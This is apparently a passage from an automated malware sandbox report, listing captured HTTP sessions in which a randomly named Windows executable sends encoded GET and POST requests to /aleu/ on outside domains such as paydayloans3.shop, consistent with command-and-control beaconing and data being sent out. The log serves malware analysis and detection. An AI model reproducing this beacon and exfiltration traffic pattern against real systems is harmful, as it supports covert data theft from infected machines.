6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.44974391.195.240.117802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:42.561650038 CEST473OUTGET /aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Apr 17, 2024 08:39:42.772665977 CEST107INHTTP/1.1 436
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:42 GMT
                                                                                                                                      content-length: 0
                                                                                                                                      server: NginX
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.44974464.190.62.22802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:48.187171936 CEST745OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 35 41 78 61 64 66 4d 54 7a 6e 48 31 58 50 64 4d 74 33 36 57 37 32 77 33 63 6c 6b 36 57 45 31 41 67 3d 3d
                                                                                                                                      Data Ascii: QbZ=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CY5AxadfMTznH1XPdMt36W72w3clk6WE1Ag==
                                                                                                                                      Apr 17, 2024 08:39:48.398648024 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:48 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.44974564.190.62.22802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:50.920397043 CEST765OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 64 30 63 33 42 47 4d 4b 66 55 63 32 6e 57 42 31 74 53 6b 62 56 74 53 59 36 64 32 43 79 4a 33 53 42 2b 45 6c 6c 36 4f 4c 76 4d 78 52 33 7a 39 41 58 52 79 71 48 48 76 70 57 49 6b 52 41 2b 51 45 49 70 70 57 75 42 39 79 49 46 33 72 79 7a 41 6d 77 4d 5a 4b 68 38 45 2b 50 63 6a 4b 4b 63 45 41 6e 6c 4c 48 73 45 35 76 54 44 50 74 59 59 66 65 35 73 64 48 46 33 42 59 70 41 51 64 2f 79 65 68 4c 66 35 78 65 48 64 63 57 74 45 37 53 44 71 62 73 51 33 56 35 38 62 6d 6f 6d 4c 67 4b 66 33 62 79 4e 56 68 41 75 79 5a 56 7a 70 45 55 3d
                                                                                                                                      Data Ascii: QbZ=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7SDqbsQ3V58bmomLgKf3byNVhAuyZVzpEU=
                                                                                                                                      Apr 17, 2024 08:39:51.132538080 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:51 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.44974664.190.62.22802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:53.656670094 CEST10847OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 56 30 66 43 56 47 4e 70 33 55 4e 47 6e 57 64 6c 74 66 6b 62 56 77 53 63 65 52 32 43 2b 5a 33 55 46 2b 57 51 35 36 4a 36 76 4d 34 52 33 7a 79 67 58 71 32 71 48 65 76 70 47 55 6b 52 51 2b 51 45 49 70 70 55 47 42 35 67 73 46 31 72 79 30 46 57 77 4c 64 4b 68 45 45 2b 57 68 6a 4f 57 54 45 77 48 6c 4c 6e 38 45 31 39 4c 44 58 39 59 61 65 65 34 70 64 48 42 65 42 59 30 2f 51 64 4c 59 65 67 7a 66 76 56 6e 69 42 59 61 71 51 39 47 5a 77 4c 6b 61 75 32 31 6a 57 58 77 71 61 41 76 46 73 2f 75 31 59 53 56 31 72 72 74 78 38 6a 75 51 5a 31 78 4e 37 79 7a 2f 30 72 58 52 43 75 4c 70 34 51 63 52 61 2b 47 6a 4e 37 76 67 6e 61 57 71 32 6b 45 63 41 4b 46 49 42 55 64 63 67 69 69 7a 37 33 64 36 38 77 4b 49 62 72 66 37 78 63 69 45 58 46 4f 4d 62 34 64 4d 70 38 72 35 71 57 75 6f 47 4d 51 32 57 48 59 78 4e 74 74 79 30 71 57 79 68 78 42 45 6a 78 4a 62 4d 46 76 48 56 4d 54 6d 4f 43 63 70 44 74 6d 76 76 5a 69 64 4a 6f 73 31 72 43 48 46 5a 55 74 43 76 44 42 58 73 4a 39 78 46 4b 41 34 4f 52 49 4f 64 43 45 66 72 36 73 74 47 56 4b 4e 67 56 59 43 47 6a 77 6c 71 45 6d 7a 72 6b 77 74 47 77 67 49 6c 30 68 41 66 7a 47 34 7a 2f 43 6a 7a 4c 4f 63 69 42 62 75 58 55 4f 77 72 36 59 59 31 6c 58 71 42 4a 69 34 6e 70 6b 75 42 76 6d 4e 50 67 44 73 75 66 64 2f 35 4d 43 4b 50 72 56 52 57 4a 36 61 5a 75 67 6d 2f 2b 5a 7a 4c 51 35 50 54 49 77 6c 43 45 77 51 6d 6a 50 5a 2b 4d 53 45 46 59 64 4a 48 54 36 2f 75 61 49 53 66 4d 41 63 4f 63 44 74 4b 43 78 45 79 49 33 61 34 48 57 6f 4a 4c 71 65 52 55 31 79 77 53 64 6a 42 6f 6c 55 50 53 47 6f 4e 57 78 55 43 7a 57 61 61 65 7a 72 77 57 6c 4c 76 44 31 68 31 45 65 36 69 37 63 6a 36 6d 49 58 66 48 68 4d 45 78 6b 73 4b 6e 4b 48 2b 34 50 34 46 41 5a 75 55 66 37 36 35 50 6b 6a 74 66 74 6c 33 67 58 6b 33 50 39 43 57 6c 51 58 31 50 63 59 4a 7a 6f 36 66 73 57 4e 6e 6e 71 79 53 6b 44 63 71 42 77 50 2b 39 64 5a 45 34 6b 33 4e 4c 44 6e 42 57 58 4a 30 57 53 63 36 59 2b 34 31 52 41 4e 7a 44 30 55 42 42 38 36 65 30 5a 52 42 58 31 35 75 51 6b 47 73 47 6a 46 46 79 64 79 4a 46 50 37 57 72 57 6d 71 66 33 44 6e 61 51 79 56 45 65 4f 2b 5a 4a 52 2b 32 38 5a 45 6e 5a 6a 64 39 6e 4a 45 64 61 32 6a 50 4f 62 62 64 6b 38 2f 70 50 79 72 6c 66 33 70 46 4f 2f 52 6d 59 51 2f 5a 59 4e 43 70 75 46 6f 49 58 37 62 66 74 53 54 76 4b 57 4a 48 2b 4e 62 47 47 61 50 6b 34 39 73 5a 42 2b 6f 71 77 5a 69 44 6d 46 6e 44 62 4b 67 6c 6c 46 45 4e 72 6c 7a 48 42 79 77 4c 59 52 35 62 79 2b 2f 75 34 39 43 66 4a 4a 52 77 6d 75 6f 38 33 72 6d 4a 63 4d 5a 42 6e 61 49 45 50 57 6c 2b 76 75 49 45 6f 48 62 71 67 4c 37 6f 79 4b 7a 62 68 7a 48 4f 37 30 44 36 36 53 30 4d 6b 46 66 75 6a 39 47 2b 65 32 4d 58 39 64 50 31 59 45 55 6f 39 56 68 43 37 31 41 64 50 73 37 37 64 52 37 4a 48 33 34 37 71 5a 4f 55 35 68 54 4b 65 36 79 6c 62 34 44 75 2b 39 63 56 51 30 55 32 65 67 39 72 31 49 58 61 58 68 4f 30 38 70 70 4c 69 77 64 31 4c 58 63 62 6d 44 6c 76 33 74 42 67 70 42 52 49 4e 5a 71 50 6d 48 54 57 53 66 6a 41 41 75 66 55 75 4f 44 50 44 49 52 65 2b 63 69 38 34 4b 54 69 54 38 6e 57 78 44 70 2b 39 67 44 76 47 2b 45 65 77 74 34 6c 32 74 61 77 6f 57 34 32 47 4d 6f 31 56 46 2b 51 56 44 30 68 4d 36 4d 6f 50 39 7a 69 34 59 62 4e 6f 32 53 42 65 6d 73 36 71 79 6d 72 6f 4e 55 61 4d 73 61 4c 37 4e 62 45 42 6c 52 42 5a 6b 38 5a 72 57 39 6d 51 47 38 7a 56 46 36 42 56 39 36 6a 58 41 38 38 6e 39 37 47 63 54 48 4c 5a 2f 42 6f 34 67 75 75 47 41 6c 4c 4d 4b 53 63 6c 41 37 31 77 59 6d 73 78 52 47 64 77 52 56 37 43 62 66 4c 70 4f 35 72 68 31 6e 57 55 4f 6f 77 53 4b 50 68 67 36 64 59 70 67 71 65 70 47 78 70 37 6e 41 61 2b 37 41 72 42 52 33 69 49 72 69 72 46 37 70 70 2f 65 50 51 61 38 44 37 48 58 75 54 72 34 72 37 6f 6d 37 51 36 31 43 64 68 66 47 4d 38 63 69 67 38 47 72 4a 64 55 4b 52 6c 68 6f 64 61 49 42 58 31 46 72 5a 43 74 74 52 63 37 51 43 2f 66 6c 43 62 74 2b 76 31 34 66 45 48 72 4f 32 34 5a 48 36 79 41 69 38 56 41 66 63 32 6b 50 57 5a 39 72 52 4e 73 4f 55 4c 62 5a 50 54 69 38 39 77 59 38 5a 48 73 35 44 6f 69 4b 73 47 2b 43 71 79 6a 45 69 63 33 4d 4f 6e 6b 6b 39 37 32 7a 39 43
                                                                                                                                      Data Ascii: QbZ=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
                                                                                                                                      Apr 17, 2024 08:39:53.868591070 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:53 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
